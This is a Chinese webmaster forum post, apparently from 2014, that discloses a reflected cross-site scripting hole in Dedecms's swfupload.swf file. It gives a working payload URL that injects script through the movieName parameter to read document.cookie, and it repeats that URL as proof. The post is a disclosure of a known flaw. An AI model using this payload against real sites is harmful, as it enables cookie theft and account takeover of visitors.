承接
网站维护 网站升级 数据转换 页面美化 插件二开 BUG修复
热门
插件 板摸 教程 分享 攻略 经验 电脑 服务器
分类
数据转换 网站升级 故障排查 BUG修复 页面美化 插件升级
草根吧»论坛首页 站长交流专区 站长头条 Dedecms flash反射性XSS跨站
返回列表 发新帖
查看: 945|回复: 0

Dedecms flash反射性XSS跨站

[复制链接]
小草根

6932

热度

1万

元宝

94

贡献

管理员

DZ专员
发表于 2014-9-28 10:13:37 |湖北| 显示全部楼层 |阅读模式
详细说明:

Location: /uploads/images/swfupload/swfupload.swf



漏洞文件为:http://www.dedecms.com/images/swfupload/swfupload.swf



这个flash文件存在漏洞,此文件漏洞可参考:https://nealpoole.com/blog/2012/ ... swfupload-plupload/



构造XSS攻击

http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

漏洞证明:

http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
flash

相关帖子
回复 <

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

小黑屋| 手机版| 草根吧

GMT+8, 2026-6-4 05:03 , Processed in 0.040861 second(s), 34 queries .

快速回复 返回顶部 返回列表